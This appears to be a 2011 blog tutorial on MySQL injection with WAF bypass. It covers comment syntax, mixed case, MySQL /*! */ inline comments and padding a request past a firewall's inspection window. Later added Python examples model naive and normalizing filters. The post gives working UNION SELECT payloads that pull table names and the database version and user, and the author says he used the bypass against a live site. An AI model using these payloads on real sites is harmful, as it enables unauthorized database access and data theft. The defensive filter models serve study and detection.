Monday, September 12, 2011

MySQL injection with WAF bypass:


Comments:

SQL comments are a gift to the injector. They let us get past many restrictions of web application firewalls, split up the keywords a filter is looking for, and cut off the tail of the legitimate query so that only the attacker's part of the statement runs. MySQL understands three comment forms:

/* ... */ (plus the MySQL-only /*! ... */ variant covered below), # to the end of the line, and -- to the end of the line. MySQL only treats -- as a comment when it is followed by whitespace, which is why the forms actually sent are --+ (the + decodes to a space in a URL) or -- -. Two entries that often appear in bypass lists are not comments at all: // means nothing to MySQL, and ; only terminates a statement, so it helps only where the application executes stacked queries.

Case changing:

Some WAFs filter keywords with a rule like /union\sselect/ig. MySQL keywords are case-insensitive, so mixed case alone defeats a case-sensitive rule; against a rule with the i flag, as here, it is the inline comment between the two words that does the work, because the rule expects whitespace there. Most of the time that is enough. Filters that match each keyword on its own need a more advanced approach, such as adding SQL keywords between the two words to separate them further:

id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point in /*!code*/. This is MySQL's own comment syntax: every other database server, and most WAFs, treat the whole thing as a comment, but MySQL executes what is inside. A version number may follow the bang, as in /*!50000 UNION */, in which case the contents run only on MySQL 5.0.0 and later.
Inline comments can be used anywhere in the statement, so if table_name or information_schema is filtered we wrap those in /*! */ as well. Note that a plain /* */ comment is discarded by the server, so every token that has to reach MySQL must sit inside the /*! */ form. For example:

id=1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM /*!information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/=database()-- -

The bypass above works. I myself used it against a web site recently.
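To make the comment and case tricks above concrete, here is an added Python example (not code from the original post) that models the difference between a WAF matching the raw parameter and one matching what MySQL will actually execute. The normalizer is an assumption modelled on MySQL's comment rules, not MySQL's lexer, and it treats comment delimiters as token boundaries, which is enough for signature matching. The payloads are the post's own, passed as the bare parameter value; the third one is a constructed variant using a versioned comment and a plain comment.

```python
import re
from urllib.parse import unquote_plus

# Rule of the kind the post describes: a regex that wants the two
# keywords next to each other, separated only by whitespace.
NAIVE_RULE = re.compile(r"union\s+select", re.IGNORECASE)

# Assumed comment handling, modelled on MySQL's rules (not MySQL's code):
_VERSIONED = re.compile(r"/\*!\d{5}(.*?)\*/", re.DOTALL)  # /*!50000 ... */
_EXECUTED = re.compile(r"/\*!(.*?)\*/", re.DOTALL)        # /*! ... */
_STRIPPED = re.compile(r"/\*.*?\*/", re.DOTALL)           # /* ... */
_LINE = re.compile(r"(?:#|--(?=\s)).*")                   # # ... and "-- " ...


def mysql_normalize(value: str) -> str:
    """Reduce a raw query-string value to roughly what the MySQL parser sees.

    Comment delimiters become token boundaries (spaces); this is enough
    for signature matching even though it is not a full tokenizer.
    """
    text = unquote_plus(value)            # '+' and %xx become plain characters
    text = _VERSIONED.sub(r" \1 ", text)  # run by MySQL at or above that version
    text = _EXECUTED.sub(r" \1 ", text)   # run by MySQL, a comment elsewhere
    text = _STRIPPED.sub(" ", text)       # plain comments are discarded
    text = _LINE.sub(" ", text)           # '#' and '-- ' drop the rest of the line
    return " ".join(text.split())         # collapse whitespace, keep case as sent


def naive_waf(value: str) -> bool:
    """Blocks when the rule matches the value exactly as received."""
    return NAIVE_RULE.search(value) is not None


def normalizing_waf(value: str) -> bool:
    """Blocks when the rule matches what MySQL would execute."""
    return NAIVE_RULE.search(mysql_normalize(value)) is not None


# Constructed inputs: the post's two payloads (parameter value only) and a
# variant with a versioned comment and a plain comment.
PAYLOADS = [
    "1/*!UnIoN*/SeLeCT",
    "1/*!UnIoN*/+SeLeCT+1,2,/*!table_name*/+FrOM+/*!information_schema*/.tables"
    "+/*!WHERE*/+/*!TaBlE_ScHeMa*/=database()--+-",
    "1/*!50000UnIoN*/+/*harmless*/+SeLeCT+1,2#",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p}\n  naive={naive_waf(p)} normalized={normalizing_waf(p)}"
              f"\n  server sees: {mysql_normalize(p)}")
```

Running it shows the raw-text rule missing every payload while the same rule applied after normalization catches all three, which is the whole point: a filter has to see the request the way the database will, or it is matching on text the server never parses.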

Buffer overflow / unexpected input:

The name is a misnomer that stuck: a WAF written in C can have memory bugs, but the effect used here is simpler. Many WAFs inspect only the first part of a large parameter, or give up on an oversized request, and hand the remainder to the application uninspected. The WAF in the example below does its job on a normal request, but lets the malicious request and its response through once the injection is pushed past that window by a large amount of data:

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA[1000 more A's])+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+
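The following added Python example (not code from the original post) models the inspection-window failure just described. It rebuilds the post's padded payload with a configurable amount of filler, then runs the same union/select signature over the first N bytes, as a size-limited WAF would, and over the whole decoded value. The limit value and the "prefix only" behaviour are assumptions used to illustrate the mechanism, not the configuration of any particular product.

```python
import re
from urllib.parse import unquote_plus

# Signature a WAF might apply after URL-decoding the parameter.
UNION_SELECT = re.compile(r"union\s+select", re.IGNORECASE)


def padded_payload(pad_len: int = 1000) -> str:
    """Rebuild the post's payload: a long hex literal ahead of the UNION."""
    pad = "0x" + "A" * pad_len
    return (f"1 and (select 1)=(Select {pad})+UnIoN+SeLeCT+1,2,version(),4,5,"
            "database(),user(),8--+")


def inspect_prefix(value: str, limit: int) -> bool:
    """Model of a WAF that decodes the value but scans only its first `limit` bytes."""
    window = unquote_plus(value)[:limit]
    return UNION_SELECT.search(window) is not None


def inspect_full(value: str) -> bool:
    """The same rule applied to the whole decoded value."""
    return UNION_SELECT.search(unquote_plus(value)) is not None


def signature_offset(value: str) -> int:
    """Where the signature sits in the decoded value, or -1 if absent."""
    m = UNION_SELECT.search(unquote_plus(value))
    return -1 if m is None else m.start()


if __name__ == "__main__":
    p = padded_payload(1000)
    print(f"signature at byte {signature_offset(p)} of {len(p)}")
    for limit in (512, 2048):
        print(f"limit={limit}: blocked={inspect_prefix(p, limit)}")
    print(f"full scan: blocked={inspect_full(p)}")
```

With 1000 bytes of filler the signature begins past byte 1000, so a 512-byte window never sees it while a full scan does. Raising the filler until the request goes through is exactly how the limit of an unknown WAF is found from the outside; the defensive fix is to reject, not pass, whatever exceeds the inspection limit.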
